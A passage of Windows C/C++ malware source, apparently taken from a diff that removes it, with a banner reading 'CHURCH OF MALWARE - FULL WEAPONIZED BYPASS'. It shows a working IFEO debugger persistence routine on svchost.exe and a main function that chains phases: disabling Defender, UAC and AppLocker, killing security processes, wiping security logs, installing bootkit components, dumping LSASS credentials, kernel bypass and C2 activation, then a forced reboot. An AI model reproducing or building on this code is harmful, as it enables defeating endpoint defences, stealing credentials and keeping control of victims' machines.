NT\\CurrentVersion\\Image File Execution Options\\svchost.exe", - 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE, NULL, &hKey, NULL) == ERROR_SUCCESS) { - wchar_t debugger[MAX_PATH]; - GetModuleFileNameW(NULL, debugger, MAX_PATH); - RegSetValueExW(hKey, L"Debugger", 0, REG_SZ, (BYTE*)debugger, (DWORD)(wcslen(debugger) * sizeof(wchar_t))); - RegCloseKey(hKey); - wprintf(L"[+] IFEO persistence\n"); - } -} - -// ============================== -// MAIN -// ============================== -int main() { - ElevateSelf(); - wprintf(L"\n[***] CHURCH OF MALWARE - FULL WEAPONIZED BYPASS [***]\n"); - - // Phase 1: Disable core protections - wprintf(L"\n=== PHASE 1: CORE PROTECTIONS ===\n"); - if (DisableTamperProtection()) Sleep(3000); - DisableDefender(); - KillDefenderProcesses(); - DisableUAC(); - DisableAppLockerWDAC(); - - // Phase 2: Anti-forensics - wprintf(L"\n=== PHASE 2: ANTI-FORENSICS ===\n"); - AddDefenderExclusions(); - DisableSecurityLogs(); - DisableSystemRestore(); - DropTelemetryPackets(); - ScrambleMemory(); - - // Phase 3: Persistence - wprintf(L"\n=== PHASE 3: PERSISTENCE ===\n"); - AddPersistence(); - InstallBootkitComponents(); - - // Phase 4: Service elimination 
- wprintf(L"\n=== PHASE 4: SERVICE ELIMINATION ===\n"); - StopSecurityServices(); - - // Phase 5: Credential access - wprintf(L"\n=== PHASE 5: CREDENTIAL ACCESS ===\n"); - DumpLSASS(); - - // Phase 6: Kernel bypass - wprintf(L"\n=== PHASE 6: KERNEL BYPASS ===\n"); - EnableKernelExecution(); - - // Phase 7: Process protection - wprintf(L"\n=== PHASE 7: PROCESS PROTECTION ===\n"); - RunAsPPL(); - - // Phase 8: C2 activation - wprintf(L"\n=== PHASE 8: C2 ACTIVATION ===\n"); - NetworkC2Setup(); - - wprintf(L"\n[+] ALL PHASES COMPLETE\n"); - wprintf(L"[!] REBOOT REQUIRED\n"); - wprintf(L"[*] Press any key to restart...\n"); - _getch(); - system("shutdown /r /t 5"); - - return 0; -}